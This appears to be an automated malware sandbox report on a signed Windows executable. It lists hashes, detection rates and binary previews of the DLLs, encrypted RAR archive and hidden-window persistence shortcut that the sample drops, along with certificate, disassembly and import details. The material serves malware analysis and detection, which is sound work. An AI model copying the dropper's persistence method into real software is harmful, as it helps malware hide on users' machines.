                                                                                      SHA1:077089E424340D3242AA6267DEA83463BDE27684
                                                                                      SHA-256:30234BF4181102110F53CCA082D710458AEE6B5D50D61082FEFE3A233CB5D1E0
                                                                                      SHA-512:509846024D6A6052815C4620DE8298FC5F4C7D87C317FA0C89F6DE4F98FBEFCCA83CCDAF689182B33E81E955BFC1A4EF9ABCFD68F4F47EA7D87194F6B2763F11
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........i.;...h...h...h7..h...h.`.i...h.`.i...h.`.i...h.`.i...h.p]h...h:a.i...h.pMh...h.r.i...h.a.i...h...ht..h.a.i...h.a.i...h.a!h...h..Ih...h.a.i...hRich...h................PE..L....J.d....................."....................@.......................................@.............................s...........P..(............... 4... ..t.......T...................x...........@............................................text............................... ..`.rdata...^.......`..................@..@.data...p=....... ..................@....rsrc...(....P.......$..............@..@.reloc..t.... ......................@..B................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):85384
                                                                                      Entropy (8bit):6.919611290059833
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:l5gNBRmfqPmw1zNhlRFZBCg6oCtfZ28nToIfxIOsIOEiiRgnL7UPUo:l583mfqtjnzag6oUYQTBfbiEiiRgLYso
                                                                                      MD5:8502FC9F36AA3D54DEE5A9B11398CA4B
                                                                                      SHA1:EB723C9BB8554FF73C2B411746CF3913902E3C5C
                                                                                      SHA-256:021A6C89040FB2644C59A55837D0967DF8FC9A880E29D9D409FBBDAA017EA5D8
                                                                                      SHA-512:6CCEBBFC75C74182DFEE79D81B4DD64E54954A9B9B1F13FF8841F01D0E02911EDC71233EDD01AB8F99E28E4219F84F11B3493E651BF273AD49FCB3863932ACED
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{.q.{.q.{.q.r..s.q.).p.x.q..n....q.).t.q.q.).u.q.q.).r.y.q...p.y.q.{.p.P.q..u.t.q..q.z.q...z.q..s.z.q.Rich{.q.........................PE..L....~.\...........!.........b..............................................`............@.............................H............@..0................/...P..$...p...T...............................@............................................text.............................. ..`.rdata..^R.......T..................@..@.data........0......................@....rsrc...0....@......................@..@.reloc..$....P......................@..B........................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):198024
                                                                                      Entropy (8bit):6.833587064048243
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:yMstwEdY9iPy5LvCTeDPJfFIgQZYrJHFIs8hmgSNSGzIcjDf7FJdkT/hb4XgYa1:Xsq79iPk6TejZ/QONHWs4SNSGz2bh8XG
                                                                                      MD5:065744FAD754C33A67FBBA59158D1278
                                                                                      SHA1:C4B8C0F9445BCD91E2CD7500CE04FBDD91805BD9
                                                                                      SHA-256:9E2A3587B21AF162C0CF518929C2B7BBE3EA8C7BA46A32867B3E0217E80C7D70
                                                                                      SHA-512:CBCCECD47266129D17E632516D47BB02A793841E88C48601703BECF3A9E70698E411E09F7B4837492EDCBE66FC7921586427193C008A127CBD4E0065403B6F3D
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................'.....'.g...'.....'.............R.............................................P.............Rich..................PE..L...$..b...........!... ............d.............LZ......................... ............@...................................(......................../.............................................@............................................text...S........................... ..`.rdata..............................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:RAR archive data, v5
                                                                                      Category:dropped
                                                                                      Size (bytes):3031946
                                                                                      Entropy (8bit):7.999940970988333
                                                                                      Encrypted:true
                                                                                      SSDEEP:49152:OLTPG84BhVtbVAXqBYzvmG6kU0thUQ1rm45S++UC81HRgTACKJ3+sdK8fE6Xdy8d:RDA6BYzOGe07Hh5S6CCmSIv6tV+W
                                                                                      MD5:BFA0D1FAC33DBEB4D50C832A97097DD8
                                                                                      SHA1:2B8D9686DE4FB3C04CB20AA2D92215C2D409E3F8
                                                                                      SHA-256:E537CEA002107EF01EFCC5C4758C54C98EB90D00AC6B1C5A0F5D44E5447881E7
                                                                                      SHA-512:BEDCFE7CBAFE854BF08A1BAF3D1FFBDF27D191B6EF0DCAE4DDEDC034B61EAFC98E790A48DED0088FCBC0AD15D61A52FC73271208004D1880B248AE7BD3852FC0
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:Rar!...................n..f..<........... sFq.3..ncm.....exe0......:..n'.*...G<3...wi..'...?'c'.j.ot...O1n.....g..i^Z..$...Rej.S..)..8..S..|*.t.....L..Y...u.pT...N....*...Q.CE..>...w.$S<6...e.+j.q.....Ah.#.*B..J1<l...\.......h(..?..).d....la0..4R.}@>2.$.......[x.{..OC..ON...S...75:d.?.E.#<.0Z.A=U5...t.E^.F.xgJO.bo<.r.....~....%...}..C..-].bt..~e.....,....G9B2./d..*....m.)...6d....S...W..$.d........==..=.kZ..@..&....'.@.C@....._.*.W#....+.,.......@L...zz.]e|.E.?..G.:U.1fF^...2T,_.H,.^....{.0...bP.]...Z...as.y>.A.U..Ll....hV...m...\.r.y..&...T..\.sw/=...-/.k.............._.$..G_.-J...Z....s...U...4....'e. .s..9..[..pb||..WL].Sv..`..Tq..LFS.r......u.t.p..s.AO.t.t...@K]h.......U.[...%...xqu).E~..xz..Nby.v1....J&.....,_#...Cw..P..!.{...).....[.9-j.._o.+.TV....\.A..&......IV4>.v.HS..y..G.*.....y...O...qk&........wu.l.@.K.L>.1..q".t...i.UL.c.J\...}.a.....q.r.1.....{..}....e.s`.u.K....z?..KkQ.....{h..A.U.}.H....,tV...:eA....IW@...Z...r.f
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sat Aug 5 00:48:42 2023, mtime=Sat Aug 5 00:48:42 2023, atime=Mon Jun 26 07:27:05 2023, length=1104928, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):1153
                                                                                      Entropy (8bit):5.008430206815985
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:8m5OgjFTjpdRJ897XlUAs4kridbLrFpB7aB6m:8mIgjFHpdRJ897XRs4kridbLr/sB6
                                                                                      MD5:12C10C63BE33FBB5D25F510D7689D86D
                                                                                      SHA1:9AF29190BC07078EA782B7860EAF0648CDA66699
                                                                                      SHA-256:56D57D559DEBF21E35F82A2597149AD0C8CB99DD2DCC7A5B7771703A1EF51CEA
                                                                                      SHA-512:C1F9CE5AFD954874F5029A9DBDCB5D04CDC5C0160A2E99920499761BF6D9EE94708F71EA07893497A90BE50C668B9025B3B6AB12C0D4111307ADE73DCC57869C
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:L..................F.... ....;..>... c..>...=un..... .........................:..DG..Yr?.D..U..k0.&...&...........-..a...>......>.......t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..W.......Y....................f.(.A.p.p.D.a.t.a...B.P.1......W....Local.<.......Ny..W.......Y.....................5..L.o.c.a.l.....^.1......W....WINMAN~1..F.......W...W.......U.....................S..w.i.n.M.a.n.a.g.e.r.....j.2. ....VcC .WINMAN~1.EXE..N.......W...W.............................W.w.i.n.M.a.n.a.g.e.r...e.x.e.......e...............-.......d.............E......C:\Users\user\AppData\Local\winManager\winManager.exe..*.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.w.i.n.M.a.n.a.g.e.r.\.w.i.n.M.a.n.a.g.e.r...e.x.e.'.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.w.i.n.M.a.n.a.g.e.r.........|....I.J.H..K..:...`.......X.......642294...........!a..%.H.VZAj.....2223........-..!a..%.H.VZAj.....2223........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.
                                                                                      Process:C:\Users\user\Desktop\_____NCM______2_10042231.exe
                                                                                      File Type:RAR archive data, v5
                                                                                      Category:dropped
                                                                                      Size (bytes):3031946
                                                                                      Entropy (8bit):7.999940970988333
                                                                                      Encrypted:true
                                                                                      SSDEEP:49152:OLTPG84BhVtbVAXqBYzvmG6kU0thUQ1rm45S++UC81HRgTACKJ3+sdK8fE6Xdy8d:RDA6BYzOGe07Hh5S6CCmSIv6tV+W
                                                                                      MD5:BFA0D1FAC33DBEB4D50C832A97097DD8
                                                                                      SHA1:2B8D9686DE4FB3C04CB20AA2D92215C2D409E3F8
                                                                                      SHA-256:E537CEA002107EF01EFCC5C4758C54C98EB90D00AC6B1C5A0F5D44E5447881E7
                                                                                      SHA-512:BEDCFE7CBAFE854BF08A1BAF3D1FFBDF27D191B6EF0DCAE4DDEDC034B61EAFC98E790A48DED0088FCBC0AD15D61A52FC73271208004D1880B248AE7BD3852FC0
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:Rar!...................n..f..<........... sFq.3..ncm.....exe0......:..n'.*...G<3...wi..'...?'c'.j.ot...O1n.....g..i^Z..$...Rej.S..)..8..S..|*.t.....L..Y...u.pT...N....*...Q.CE..>...w.$S<6...e.+j.q.....Ah.#.*B..J1<l...\.......h(..?..).d....la0..4R.}@>2.$.......[x.{..OC..ON...S...75:d.?.E.#<.0Z.A=U5...t.E^.F.xgJO.bo<.r.....~....%...}..C..-].bt..~e.....,....G9B2./d..*....m.)...6d....S...W..$.d........==..=.kZ..@..&....'.@.C@....._.*.W#....+.,.......@L...zz.]e|.E.?..G.:U.1fF^...2T,_.H,.^....{.0...bP.]...Z...as.y>.A.U..Ll....hV...m...\.r.y..&...T..\.sw/=...-/.k.............._.$..G_.-J...Z....s...U...4....'e. .s..9..[..pb||..WL].Sv..`..Tq..LFS.r......u.t.p..s.AO.t.t...@K]h.......U.[...%...xqu).E~..xz..Nby.v1....J&.....,_#...Cw..P..!.{...).....[.9-j.._o.+.TV....\.A..&......IV4>.v.HS..y..G.*.....y...O...qk&........wu.l.@.K.L>.1..q".t...i.UL.c.J\...}.a.....q.r.1.....{..}....e.s`.u.K....z?..KkQ.....{h..A.U.}.H....,tV...:eA....IW@...Z...r.f
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.848449871713718
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:_____NCM______2_10042231.exe
                                                                                      File size:21'154'848 bytes
                                                                                      MD5:ea6810e51b21867f42c2dc3c485ef68e
                                                                                      SHA1:dd2732626c4512ff161f76b9f08f56f5027dec0a
                                                                                      SHA256:6385d6449f490e42e0f37346abe0e098846b38a210e46b66cc51c1e56414e289
                                                                                      SHA512:e7a923ff630bb61a5463932badbb12cdd6be8e6fc243e0078364e01f5220b325d4cb4fc6d8521fae6292bc70e7c7fea658efc22a9ec6dd7060b46cb594667c52
                                                                                      SSDEEP:393216:jd1WCLwe01E+DKXy6jo+TP4x/W6aBm6fcPLzJbSafWtN6TXj2n:PxwoXyeoLiqzzMafWW2n
                                                                                      TLSH:982712B17F518072D6970230553AFF7A9DBDA6242738E2D3B3D04D28DE351C1A63A36A
                                                                                      File Content Preview:MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$.......E.^...0...0...0..E....0..E....0..E..#.0...4...0..y....0.e.4...0...4.#.0...3...0...5...0.......0.S.4.'.0.S.3...0.S.5...0.......0
                                                                                      Icon Hash:2d2e3797b32b2b99
                                                                                      Entrypoint:0x59ae79
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:true
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x64995482 [Mon Jun 26 09:04:02 2023 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:11350cbad4b0cb25605068e1a37756f1
                                                                                      Signature Valid:true
                                                                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                      Signature Validation Error:The operation completed successfully
                                                                                      Error Number:0
                                                                                      Not Before, Not After
                                                                                      • 5/22/2023 5:00:00 PM 6/14/2024 4:59:59 PM
                                                                                      Subject Chain
                                                                                      • CN=Guangxi Yunao Network Technology Co. Ltd., O=Guangxi Yunao Network Technology Co. Ltd., L=Beihai, S=Guangxi Zhuang Autonomous Region, C=CN, SERIALNUMBER=91450500MAA7H9NJ04, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.1=Beihai Industrial Park, OID.1.3.6.1.4.1.311.60.2.1.2=Guangxi, OID.1.3.6.1.4.1.311.60.2.1.3=CN
                                                                                      Version:3
                                                                                      Thumbprint MD5:71C65271AD0BF6501F356C167CAAFCB9
                                                                                      Thumbprint SHA-1:FE186438F2ABEF2DDA453E52E51F852147DE2E7D
                                                                                      Thumbprint SHA-256:1386F2F72F749FE2B40C125A3CEB5A1B170745E1D786E17A1781A0A471005EB7
                                                                                      Serial:0144C41E1909E7332C5BA64F0042EE86
                                                                                      Instruction
                                                                                      call 00007F7440FA9EE3h
                                                                                      jmp 00007F7440FA913Fh
                                                                                      push 00000010h
                                                                                      push 008FC048h
                                                                                      call 00007F7440FA9836h
                                                                                      xor ebx, ebx
                                                                                      mov dword ptr [ebp-20h], ebx
                                                                                      mov byte ptr [ebp-19h], bl
                                                                                      mov dword ptr [ebp-04h], ebx
                                                                                      cmp ebx, dword ptr [ebp+10h]
                                                                                      je 00007F7440FA92DDh
                                                                                      mov ecx, dword ptr [ebp+14h]
                                                                                      call dword ptr [00811DBCh]
                                                                                      mov ecx, dword ptr [ebp+08h]
                                                                                      call dword ptr [ebp+14h]
                                                                                      mov eax, dword ptr [ebp+0Ch]
                                                                                      add dword ptr [ebp+08h], eax
                                                                                      inc ebx
                                                                                      mov dword ptr [ebp-20h], ebx
                                                                                      jmp 00007F7440FA92A2h
                                                                                      mov al, 01h
                                                                                      mov byte ptr [ebp-19h], al
                                                                                      mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                      call 00007F7440FA92DDh
                                                                                      mov ecx, dword ptr [ebp-10h]
                                                                                      mov dword ptr fs:[00000000h], ecx
                                                                                      pop ecx
                                                                                      pop edi
                                                                                      pop esi
                                                                                      pop ebx
                                                                                      leave
                                                                                      retn 0014h
                                                                                      mov ebx, dword ptr [ebp-20h]
                                                                                      mov al, byte ptr [ebp-19h]
                                                                                      test al, al
                                                                                      jne 00007F7440FA92D1h
                                                                                      push dword ptr [ebp+18h]
                                                                                      push ebx
                                                                                      push dword ptr [ebp+0Ch]
                                                                                      push dword ptr [ebp+08h]
                                                                                      call 00007F7440FA8CFAh
                                                                                      ret
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      mov ecx, 00000001h
                                                                                      movsd xmm5, qword ptr [0083D348h]
                                                                                      jmp 00007F7440FA92DEh
                                                                                      mov ecx, 00000002h
                                                                                      movsd xmm5, qword ptr [0083D350h]
                                                                                      jmp 00007F7440FA92CFh
                                                                                      mov ecx, 00000003h
                                                                                      movsd xmm5, qword ptr [0083D348h]
                                                                                      movd eax, xmm0
                                                                                      and eax, 7FFFFFFFh
                                                                                      cmp eax, 7F800000h
                                                                                      jnc 00007F7440FA9412h
                                                                                      sldt word ptr [eax]
                                                                                      Programming Language:
                                                                                      • [C++] VS2008 SP1 build 30729
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                      • [C++] VS2015 UPD2 build 23918
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x5080940x1b8.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x140e0000x2cbd0.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x14298000x3420.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x4d6d100x70.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x4d6e200x18.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4d6d800x40.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x4110000xdbc.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x40f5c60x40f600unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x4110000xfbb220xfbc00False0.3988244398584906data5.8149063298972035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0x50d0000xf009600xef1600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0x140e0000x2cbd00x2cc00False0.9743256808659218data7.976393240181808IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      ZIPRES0x140f4800x2b289dataChineseChina0.9944223513239845
                                                                                      RT_ICON0x140e2200x128Device independent bitmap graphic, 16 x 32 x 4, image size 192ChineseChina0.5675675675675675
                                                                                      RT_ICON0x140e3480x568Device independent bitmap graphic, 16 x 32 x 8, image size 320ChineseChina0.4486994219653179
                                                                                      RT_ICON0x140e8b00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640ChineseChina0.4637096774193548
                                                                                      RT_ICON0x140eb980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152ChineseChina0.3935018050541516
                                                                                      RT_GROUP_ICON0x140f4400x3edataChineseChina0.8387096774193549
                                                                                      RT_VERSION0x143a7100x22cdataChineseChina0.5233812949640287
                                                                                      RT_MANIFEST0x143a9400x28bXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5529953917050692
                                                                                      DLLImport
                                                                                      KERNEL32.dllConvertThreadToFiber, GetSystemTime, ConvertFiberToThread, GetVersionExW, FormatMessageW, FindNextFileA, ExitProcess, CreateMutexW, OpenMutexW, GetCommandLineW, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, CreateFiber, DeleteFiber, SwitchToFiber, ReadConsoleA, SetConsoleMode, SetEndOfFile, GetModuleHandleW, DeleteCriticalSection, DecodePointer, RaiseException, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, IsBadReadPtr, FreeLibrary, GetProcessHeap, HeapAlloc, GetNativeSystemInfo, LoadLibraryA, VirtualAlloc, VirtualFree, SetLastError, HeapFree, VirtualProtect, Process32NextW, Process32FirstW, CreateToolhelp32Snapshot, OpenMutexA, GetEnvironmentVariableW, GetModuleFileNameW, GetProcAddress, GetModuleHandleA, DeleteFileA, IsBadWritePtr, lstrcpyW, SetCurrentDirectoryW, GetACP, GetTickCount, GetLocalTime, FileTimeToSystemTime, lstrcpynW, Sleep, GlobalFree, GlobalAlloc, GetFileSize, GetDiskFreeSpaceExW, GetDriveTypeW, GetLogicalDriveStringsW, GetLogicalDrives, lstrlenW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, GetLastError, SetFileAttributesW, FindFirstFileW, GetShortPathNameW, WideCharToMultiByte, SystemTimeToFileTime, GetCurrentDirectoryW, CloseHandle, LocalFileTimeToFileTime, MultiByteToWideChar, GetFileAttributesW, CreateFileW, SetFilePointer, SetFileTime, WriteFile, ReadFile, CreateDirectoryW, LockResource, OutputDebugStringA, EncodePointer, GetCurrentThreadId, GetSystemDirectoryW, LoadLibraryExW, LoadLibraryW, GlobalDeleteAtom, lstrcmpW, GlobalAddAtomW, GlobalFindAtomW, CompareStringW, GlobalLock, GlobalUnlock, GlobalSize, LocalFree, MulDiv, CopyFileW, SetErrorMode, GlobalGetAtomNameW, InitializeCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GlobalReAlloc, GlobalHandle, LocalAlloc, LocalReAlloc, GetCurrentProcessId, SetEvent, WaitForSingleObject, CreateEventW, ResumeThread, GetCurrentThread, lstrcmpA, GetLocaleInfoW, GetUserDefaultUILanguage, GlobalFlags, FindResourceExW, GetWindowsDirectoryW, lstrcmpiW, FlushFileBuffers, GetFullPathNameW, GetVolumeInformationW, LockFile, UnlockFile, DuplicateHandle, GetCurrentProcess, VerSetConditionMask, VerifyVersionInfoW, FileTimeToLocalFileTime, GetFileAttributesExW, GetFileSizeEx, GetFileTime, SystemTimeToTzSpecificLocalTime, GetTempPathW, GetProfileIntW, SearchPathW, GetTempFileNameW, GetUserDefaultLCID, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, ResetEvent, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, OutputDebugStringW, GetStringTypeW, TryEnterCriticalSection, SwitchToThread, GetExitCodeThread, LCMapStringW, GetCPInfo, InterlockedIncrement, InterlockedDecrement, MoveFileExW, CompareFileTime, FileTimeToDosDateTime, DosDateTimeToFileTime, GetSystemInfo, ReleaseSemaphore, CreateSemaphoreW, WaitForMultipleObjects, SleepEx, GetSystemDirectoryA, MoveFileExA, GetEnvironmentVariableA, GetStdHandle, GetFileType, PeekNamedPipe, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, CreateThread, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetCommandLineA, HeapQueryInformation, VirtualQuery, SetStdHandle, GetModuleFileNameA, SetFilePointerEx, GetConsoleMode, ReadConsoleW, GetConsoleCP, GetDateFormatW, GetTimeFormatW, IsValidLocale, EnumSystemLocalesW, GetTimeZoneInformation, FindFirstFileExA, IsValidCodePage, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetConsoleCtrlHandler, WriteConsoleW, CreateTimerQueue, SignalObjectAndWait, GetThreadPriority, GetLogicalProcessorInformation, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, GetThreadTimes, InterlockedPopEntrySList, QueryDepthSList, UnregisterWaitEx, SizeofResource, FreeResource, LoadResource, SetThreadPriority, FindResourceW
                                                                                      USER32.dllInsertMenuW, AppendMenuW, RemoveMenu, DrawTextW, DrawTextExW, GrayStringW, TabbedTextOutW, GetDC, GetWindowDC, ReleaseDC, ClientToScreen, FillRect, GetSystemMetrics, DestroyMenu, GetMenuItemInfoW, InflateRect, CopyImage, SendDlgItemMessageA, SetRectEmpty, OffsetRect, GetWindowThreadProcessId, GetMessageW, TranslateMessage, GetCursorPos, GetSysColorBrush, LoadCursorW, RealChildWindowFromPoint, GetAsyncKeyState, MapDialogRect, IntersectRect, TrackMouseEvent, InvalidateRect, DestroyIcon, LoadImageW, ShowOwnedPopups, SetCursor, DeleteMenu, SetTimer, CreatePopupMenu, GetMenuDefaultItem, CharUpperW, GetNextDlgGroupItem, SetCapture, ReleaseCapture, WindowFromPoint, DrawFocusRect, IsRectEmpty, DrawIconEx, GetIconInfo, EnableScrollBar, HideCaret, InvertRect, NotifyWinEvent, MapVirtualKeyW, GetKeyNameTextW, LoadMenuW, SetLayeredWindowAttributes, EnumDisplayMonitors, SetClassLongW, SetParent, OpenClipboard, CloseClipboard, SetClipboardData, EmptyClipboard, DrawStateW, DrawEdge, DrawFrameControl, GetNextDlgTabItem, GetSystemMenu, BringWindowToTop, SetCursorPos, CopyIcon, FrameRect, DrawIcon, UnionRect, UpdateLayeredWindow, MonitorFromPoint, LoadAcceleratorsW, TranslateAcceleratorW, DefWindowProcW, UnpackDDElParam, ReuseDDElParam, GetComboBoxInfo, PostThreadMessageW, WaitMessage, GetKeyboardLayout, IsCharLowerW, MapVirtualKeyExW, ToUnicodeEx, GetKeyboardState, CreateAcceleratorTableW, DestroyAcceleratorTable, CopyAcceleratorTableW, GetMenuStringW, LockWindowUpdate, SetMenuDefaultItem, GetDoubleClickTime, ModifyMenuW, RegisterClipboardFormatW, CharUpperBuffW, IsClipboardFormatAvailable, GetUpdateRect, DrawMenuBar, DefFrameProcW, DefMDIChildProcW, TranslateMDISysAccel, SubtractRect, CreateMenu, GetWindowRgn, DestroyCursor, RegisterClassExW, CharPrevW, CreateCaret, GetCaretBlinkTime, ShowCaret, SetCaretPos, GetCaretPos, wsprintfA, DrawTextA, InvalidateRgn, GetGUIThreadInfo, CharPrevExA, GetMessagePos, PeekMessageW, DispatchMessageW, RegisterWindowMessageW, EndDialog, CreateDialogIndirectParamW, WinHelpW, GetScrollInfo, SetScrollInfo, LoadIconW, CallNextHookEx, UnhookWindowsHookEx, SetWindowsHookExW, GetWindow, GetLastActivePopup, GetTopWindow, GetClassNameW, GetParent, GetClassLongW, PtInRect, EqualRect, CopyRect, GetSysColor, MapWindowPoints, AdjustWindowRectEx, GetWindowTextLengthW, GetWindowTextW, RemovePropW, GetPropW, SetPropW, ShowScrollBar, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, ScrollWindow, RedrawWindow, ValidateRect, EndPaint, BeginPaint, SetForegroundWindow, GetForegroundWindow, SetActiveWindow, UpdateWindow, TrackPopupMenu, GetMenuItemCount, GetMenuItemID, GetSubMenu, SetMenu, GetMenu, GetCapture, GetKeyState, GetFocus, SetFocus, GetDlgCtrlID, GetDlgItem, IsWindowVisible, EndDeferWindowPos, IsDialogMessageW, GetProcessWindowStation, GetUserObjectInformationW, GetMenuState, SetWindowTextW, CheckDlgButton, MoveWindow, LoadBitmapW, SetMenuItemInfoW, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, EnableMenuItem, CheckMenuItem, IsWindowEnabled, SetRect, DeferWindowPos, BeginDeferWindowPos, SetWindowPlacement, GetWindowPlacement, DestroyWindow, GetActiveWindow, IsChild, IsMenu, IsWindow, CreateWindowExW, GetClassInfoExW, GetClassInfoW, RegisterClassW, IsZoomed, CallWindowProcW, FlashWindow, FindWindowW, PostMessageW, EnableWindow, MessageBeep, SendMessageW, KillTimer, ShowWindow, PostQuitMessage, SetWindowRgn, GetClientRect, ScreenToClient, IsIconic, MonitorFromWindow, GetMonitorInfoW, GetDesktopWindow, MessageBoxW, SetWindowLongW, GetWindowLongW, SetWindowPos, GetWindowRect, SystemParametersInfoW, wsprintfW, CharNextW, InsertMenuItemW, GetMessageTime
